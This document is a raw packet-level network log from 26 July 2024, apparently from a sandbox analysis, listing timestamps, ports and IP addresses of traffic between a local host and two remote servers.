Jul 26, 2024 18:56:43.708590984 CEST	49758	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:43.708853006 CEST	49758	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:43.708864927 CEST	443	49758	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:44.417903900 CEST	443	49758	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:44.417958975 CEST	49758	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:44.418606043 CEST	49758	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:44.418615103 CEST	443	49758	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:44.421153069 CEST	49758	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:44.421160936 CEST	443	49758	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:46.269013882 CEST	443	49758	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:46.269097090 CEST	443	49758	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:46.269166946 CEST	49758	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:46.270340919 CEST	49758	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:46.270358086 CEST	443	49758	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:46.271739006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.283284903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.557104111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.557159901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.557791948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.557806015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.557832003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.557851076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.560684919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.560697079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.560723066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.560739040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.563827991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.563841105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.563868999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.563893080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.567001104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.567012072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.567035913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.567051888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.570719957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.570732117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.570764065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.572833061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.572844982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.572853088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.572870016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.572894096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.575231075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.575242996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.575265884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.575283051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.577836990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.577848911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.577876091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.577898026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.581073046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.581084013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.581108093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.581124067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.582979918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.582990885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.582998037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.583024025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.583046913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.585308075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.585319042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.585356951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.587742090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.587753057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.587785006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.587810993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.590023041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.590034962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.590065002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.592104912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.592114925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.592149019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.592189074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.594394922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.594408035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.594415903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.594453096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.594470024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.596470118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.596486092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.596512079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.596528053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.598668098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.598679066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.598706007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.598721981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.600701094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.600713015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.600752115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.600785017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.608613014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.608623981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.608634949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.608660936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.608691931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.613542080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.613554001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.613591909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.613625050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.618422985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.618433952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.618478060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.618510008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.623708010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.623719931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.623769045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.629797935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.629811049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.629847050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.629880905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.630795956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.630808115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.630816936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.630825996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.630856037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.630856037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.630891085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.674809933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.674828053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.674838066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.674849033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.674885988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.674885988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.674926996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.675496101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.675568104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.676258087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.676270962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.676321030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.678292990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.678304911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.678314924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.678361893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.678396940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.679980040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.679991007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.680039883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.680039883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.682007074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.682018995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.682073116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.684134007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.684148073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.684204102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.686070919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.686084032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.686136961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.686136961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.688111067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.688123941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.688132048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.688163042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.688206911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.690166950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.690179110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.690227032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.692169905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.692182064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.692235947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.693603039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.693615913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.693669081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.695110083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.695121050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.695131063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.695168018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.695202112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.696085930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.696098089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.696145058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.697355032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.697366953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.697417974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.698605061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.698617935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.698659897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.699861050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.699872971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.699908972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.699940920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.701189041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.701200962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.701211929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.701235056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.701267004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.703073978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.703085899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.703119993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.703157902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.703722000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.703733921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.703773022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.705039024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.705051899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.705085993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.705116034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.706219912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.706233025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.706243038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.706276894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.706276894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.706312895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.707381964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.707395077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.707434893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.708432913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.708446026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.708499908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.708499908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.736146927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.736205101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.736490965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.736532927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.736874104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.736886024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.736917973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.736952066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.738168001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.738179922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.738214016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.738246918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.739289999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.739301920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.739334106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.739365101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.740710974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.740724087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.740755081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.740786076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.741914988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.741928101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.741971970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.742007017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.743321896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.743334055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.743344069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.743366957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.743398905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.744474888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.744493008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.744538069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.744538069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.745796919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.745809078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.745841980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.747029066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.747041941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.747078896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.748179913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.748193026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.748203039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.748253107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.748253107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.749166012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.749178886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.749217987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.750188112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.750200987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.750237942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.751261950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.751275063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.751311064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.751348019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.752966881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.752980947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.753014088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.753057003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.754590988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.754606009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.754617929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.754642963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.754687071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.755928993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.755942106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.755978107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.756016016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.757178068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.757191896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.757221937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.757263899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.758539915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.758553982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.758588076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.759802103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.759816885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.759826899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.759841919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.759866953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.760843992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.760855913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.760884047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.760905981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.762089968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.762101889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.762142897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.763282061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.763293982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.763328075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.764632940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.764645100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.764673948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.764703035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.765662909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.765675068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.765682936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.765691996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.765703917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.765736103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.766968966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.766980886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.767008066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.767035961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.781322002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.781335115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.781377077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.781420946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.781985044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.782023907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.782594919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.782624960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.782650948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.782670975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.783905983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.783917904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.783927917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.783946991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.783986092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.784960032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.784970999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.785005093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.786114931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.786127090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.786173105 CEST	49757	80	192.168.2.4	147.45.44.104
